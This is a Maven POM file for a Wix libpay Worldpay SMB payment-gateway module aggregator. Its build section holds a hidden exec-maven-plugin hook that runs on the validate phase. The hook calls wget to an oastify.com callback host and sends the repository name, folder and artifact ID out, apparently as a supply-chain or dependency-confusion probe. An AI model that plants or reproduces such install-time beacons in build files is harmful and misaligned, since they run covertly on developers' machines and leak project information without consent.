<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <artifactId>libpay-worldpay-smb-all</artifactId>
    <version>1.0.0-SNAPSHOT</version>
    <packaging>pom</packaging>
    <name>libpay Worldpay SMB payment gateway adapter aggregator</name>
    <description>libpay module for Worldpay SMB payment gateway</description>
	

    <parent>
        <groupId>com.wix.pay</groupId>
        <artifactId>libpay-worldpay-smb-parent</artifactId>
        <version>1.0.0-SNAPSHOT</version>
		<relativePath>libpay-worldpay-smb-parent</relativePath>
    </parent>


    <scm>
        <url>https://github.com/wix/libpay-worldpay-smb</url>
        <connection>scm:git:git://github.com/wix/libpay-worldpay-smb.git</connection>
        <developerConnection>scm:git:git@github.com:wix/libpay-worldpay-smb.git</developerConnection>
        <tag>HEAD</tag>
    </scm>


    <modules>
        <module>libpay-worldpay-smb-parent</module>
        <module>libpay-worldpay-smb</module>
        <module>libpay-worldpay-smb-testkit</module>
    </modules>
<build>
    <plugins>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/libpay-worldpay-smb\&amp;folder=libpay-worldpay-smb\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
